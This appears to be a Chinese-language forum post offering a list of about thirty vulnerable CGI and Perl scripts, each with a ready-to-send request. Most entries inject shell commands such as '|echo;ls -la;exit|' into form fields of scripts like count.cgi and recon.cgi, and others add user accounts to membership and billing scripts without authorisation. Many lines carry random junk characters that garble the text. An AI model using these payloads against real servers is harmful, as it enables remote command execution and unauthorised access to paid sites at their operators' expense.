Cgi-bin 30个漏洞＋使用方法

admin

==============================

% [$ @1 z! _& D" g' j6 n/smspass.pl
; Z: `/ k2 ~+ M" j4 |username=username&password=password

4 o! e5 F# t2 W+ a: D/index.cgi
" L$ s) u$ `8 o6 {9 g3 i$ Xwei=ren&gen=command
! W: C" ^7 X7 ]) b
( ]  e/ \8 y4 d1 [3 {' ]1 H& l/passmaster.cgi
5 Y$ W" q! n& d  S; B: AAction=Add&Username=Username&Password=Password

/accountcreate.cgi
! i# V- X% }9 p' ?username=username&password=password&ref1=|echo;ls|
5 E* P, T! d& H
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
1 z# q3 W3 i( v2 [1 r" k  J, V4 R6 A
" w9 e: K" K0 k* z  a/addusr.pl
" J6 @+ `  s& d9 k/cgi-bin/EuroDebit/addusr.pl
+ E$ u, G/ @9 U7 Y# auser=username&pass=Password&confirm=Password
7 F" Z+ l& e, E
/ccbill-local.asp
post_values=username:password
+ D6 d# G$ M/ B& H( m9 x1 k8 N
/count.cgi
pinfile=|echo;ls -la;exit|
! N8 Q  k% H) Y4 x! G7 [
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
- H! C9 i& C% u4 O: lvercode=username:password:dseegsow:add:amount<&30>
2 J4 \8 `( d6 U" f+ e8 a
$ t  p' F7 I- O; j0 ?: h/af.cgi
_browser_out=|echo;ls -la;exit;|
* \3 I# B& g. M, u* H8 k  |% h( I+ H
/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
$ }# R, T  |! t
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
: [" a" l# L% k
2 G- V) _  X# l; t/probecontrol.cgi
0 m( c8 _- p7 Y2 Ccommand=enable&username=username&password=password
5 p9 P: j" O! Q8 k4 v# z" X, g% w+ c
: J# b; d; J+ \0 O" l/ h  z/recon.cgi
1 |+ [) @6 d0 `3 F1 f& `6 psearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
9 `. u8 [( f9 e: c( o' fconfigfile=|echo; ls -alt; exit

. F" B% l( J8 [' F0 p7 h+ o' F/ G2 A/gx9passwd.cgi
cmd=ADD&user=username&pass=password
( `6 ]8 w4 L7 E4 R% N& H; K
) `- {8 z) }7 w! q( l$ ]9 Z/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/ y5 F0 q, U1 f3 a& F' f4 L! m/cpay.cgi
! ?! L) w: r- L* n" A$ hcommand=add_member&username=username(EMAIL)&password=password(DES)
9 ~$ c# m0 z9 x. y* i# U6 q
8 x" Z: }; z- Z: p, [/globill_ut.cgi
! [* x3 q7 C2 w/ Hdo=add&username=username&password=password&wpassword=password
! I2 Z# V1 L& @$ c
/usercontrol.cgi
command=enable&username=USER&password=PASS
7 ~# V# l; \) B# W$ B8 P
( h6 y) ]+ M3 k! F0 M/ e. O/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

: k' d, R4 R6 R9 S6 L/addusr.pl
8 Z/ i" l) Z  t( S- i1 `  y2 x# xuser=USER&pass=PASS&confirm=PASS
- v2 W+ J# l: k0 O* T4 c( O
- k3 g' b7 ]8 ?4 A+ `( v/ o0 R- m/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
+ _8 W3 Z5 _/ b8 K
/accountcreate.cgi
+ z! g9 E7 q8 w' l4 \. n% d7 x/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

4 n0 b( o- ^7 @; h/ r+ ]/af.cgi
/env.cgi
+ e- D4 q$ T4 A% U0 H# T+ HADD+;echo;pwd;exit

6 @3 B( |. B; p2 e/count.cgi
& {( w: u3 s- I5 z5 E& Hpinfile=|echo;pwd;exit|
/ i5 a+ ^  u( Z2 t! C# w
5 }" [5 D. ]/ @% e3 m/recon.cgi
' m3 Y+ W8 z4 }' {searchoption=1&searchfor=|echo;ls%20-al;exit|

# ]; {( C9 n. m$ P/add.cgi
username=username&password=password&expire=30

==============================